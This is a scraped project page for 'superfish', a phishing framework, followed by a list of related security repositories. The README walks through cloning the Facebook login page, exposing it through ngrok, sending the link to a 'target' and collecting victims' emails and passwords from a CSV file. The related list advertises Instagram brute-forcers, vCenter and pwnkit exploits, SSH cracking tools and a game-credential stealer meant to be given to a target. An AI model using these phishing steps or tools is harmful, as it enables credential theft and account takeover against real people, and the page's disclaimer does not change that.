Simple and easy framework for phishing 🎣

Overview

πŸ‘‹ It's in beta, I'm still building


How to install

Linux and Termux:

  • Clone Rp: git clone https://github.com/J4c5/superfish.git
  • Install the dependencies: pip3 install -r requirements.txt

Arguments and Usage

The list of arguments are these:

--import-template
--clone-template
--local-template
--webserver-port
--webserver-host
--redirect
--output

Description of each argument

  • --import-template: import a login template using a url for example: --import-template=https://facebook.com/login
  • --local-template: use a local template that you might have downloaded to an index.html, example: --local-template=./mytemplate/index.html
  • --clone-template: download complete webpages using this script, example: ./superfish.py --clone-template=https://instagram.com
  • --webserver-port: configure a port for the server the default is 8080, example: --webserver-port=8082
  • --webserver-host: configure a host, the default is: 127.0.0 1, example: --webserver-host=0.0.0.0
  • --redirect: configure where the victim will be directed to post the phishing, example: --redirect=https://facebook.com
  • --output: edit the phishing output, if you want in csv use: --output=csv or you want text: --output=text

Examples

⚠ Warning - Do not use these means for bad things, this tool and author is not responsible for any damage caused. the methods explained here are for the purpose of teaching how the framework works.

Clone the facebook login page and create a link to it for everyone:

  • 1 Start Ngrok Service: ngrok http 1337
  • 2 Start SuperFish: python3 superfish.py --import-template=https://facebook.com/login --redirect=https://facebook.com --webserver-port=1337 --output=csv
  • 3 share the public ngrok link with the target, the link will look like: "https://9470-131-161-179-245.ngrok.io"
  • 4 then look in the CSV file, you will see the ip of the email and the password of the victim.

Terms and Warns

1 This tool/author does not take responsibility for damages to third parties, this responsibility is entirely and completely from the user License:

MIT License

Copyright (c) 2021 Jack

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Owner
Jack
Estudante de Segurança da Informação meu passa-tempo e criar ferramentas. Stack: Go, Py, C+, NodeJS
Jack
Proof of Concept Exploit for vCenter CVE-2021-21972

CVE-2021-21972 Proof of Concept Exploit for vCenter CVE-2021-21972

Horizon 3 AI Inc 210 Dec 31, 2022
This is tools hacking for scan vuln in port web, happy using

Xnuvers007 PortInjection this is tools hacking for scan vuln in port web, happy using view/show python 3.9 solo coder (tangerang) 19 y/o installation

XnuxersXploitXen 6 Dec 24, 2022
Instagram brute force tool that uses tor as its proxy connections

Insta-crack This is a instagram brute force tool that uses tor as its proxy connections, keep in mind that you should not do anything illegal with thi

Liam 3 Jan 28, 2022
CVE-2021-21985 VMware vCenter ServerθΏœη¨‹δ»£η ζ‰§θ‘ŒζΌζ΄ž EXP (ζ›΄ζ–°ε―ε›žζ˜ΎEXP)

CVE-2021-21985 CVE-2021-21985 EXP ζœ¬ζ–‡δ»₯及ε·₯ε…·δ»…ι™ζŠ€ζœ―εˆ†δΊ«οΌŒδΈ₯η¦η”¨δΊŽιžζ³•η”¨ι€”οΌŒε¦εˆ™δΊ§η”Ÿηš„δΈ€εˆ‡εŽζžœθ‡ͺθ‘Œζ‰Ώζ‹…γ€‚ 0x01 εˆ©η”¨Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmiιœ€θ¦bypassι«˜η‰ˆζœ¬jdk java -jar JNDIIn

r0cky 355 Aug 03, 2022
IDA Python Script for anti ollvm

IDA Python Script for anti ollvm

Shocker 62 Dec 23, 2022
Detection And Breaking With Python

Detection And Breaking IIIIIIIIIIIIIIIIIIII PPPPPPPPPPPPPPPPP VVVVVVVV VVVVVVVV I::::::::II::::::::I P:::::::

Baris Dincer 1 Dec 26, 2021
log4j-tools: CVE-2021-44228 poses a serious threat to a wide range of Java-based applications

log4j-tools Quick links Click to find: Inclusions of log4j2 in compiled code Calls to log4j2 in compiled code Calls to log4j2 in source code Overview

JFrog Ltd. 171 Dec 25, 2022
Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions

dns-mf-hazard Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions How to use it? Installation You need python

Marek Wajdzik 2 Jan 01, 2022
Python exploit code for CVE-2021-4034 (pwnkit)

Python3 code to exploit CVE-2021-4034 (PWNKIT). This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works

Joe Ammond 92 Dec 29, 2022
SpiderFoot automates OSINT collection so that you can focus on analysis.

SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of m

Steve Micallef 9k Jan 08, 2023
An Advanced Local Network IP Scanner, made in python of course!

β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β€ƒβ€ƒβ–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆ

Polsulpicien 2 Dec 18, 2021
MassStringer, CTF Flag Finder

massStringer MassStringer, CTF Flag Finder Usage: python3 massStringer.py Enter absolute path of the directory to scan for flags Edit "flag = re.searc

SuperTsumu 4 Sep 06, 2022
Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potential blockers.

Fuzz introspector Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potenti

Open Source Security Foundation (OpenSSF) 221 Jan 01, 2023
Utility for Extracting all passwords from ConnectWise Automate

CWA Password Extractor Utility for Extracting all passwords from ConnectWise Automate (E.g. while migrating to a new system). Outputs a csv file with

Matthew Kyles 1 Dec 09, 2021
Repo for The Crown: Exploratory Analysis of Nim Malware DEF CON 615 talk

Repo for "The Crown: Exploratory Analysis of Nim Malware" DEF CON 615 talk

HuskyHacks 43 Dec 03, 2022
SSH Tool For OSINT and then Cracking.

sshmap SSH Tool For OSINT and then Cracking. Linux Systems Only Usage: Scanner Syntax: scanner start/stop/status - Sarts/stops/sho

Miss Bliss 5 Apr 04, 2022
This program will brute force any Instagram account you send it its way given a list of proxies.

Instagram Bruter This program will brute force any Instagram account you send it its way given a list of proxies. NOTICE I'm no longer maintaining thi

1 Nov 15, 2021
Simples brute forcer de diretorios para web pentest.

πŸ¦‘ dirbruter Simples brute forcer de diretorios para web pentest. ❕ Atenção NΓ£o ataque sites privados. Isto Γ© illegal. πŸ–₯️ PrΓ©-requisitos Ultima versΓ£

Dio brando 6 Jan 22, 2022
Growtopia Save.dat Stealer

savedat-stealer Growtopia Save.dat Stealer (Auto Send To Webhook) How To Use After Change Webhook URL Compile script to exe Give to target Done Info C

NumeX 9 May 01, 2022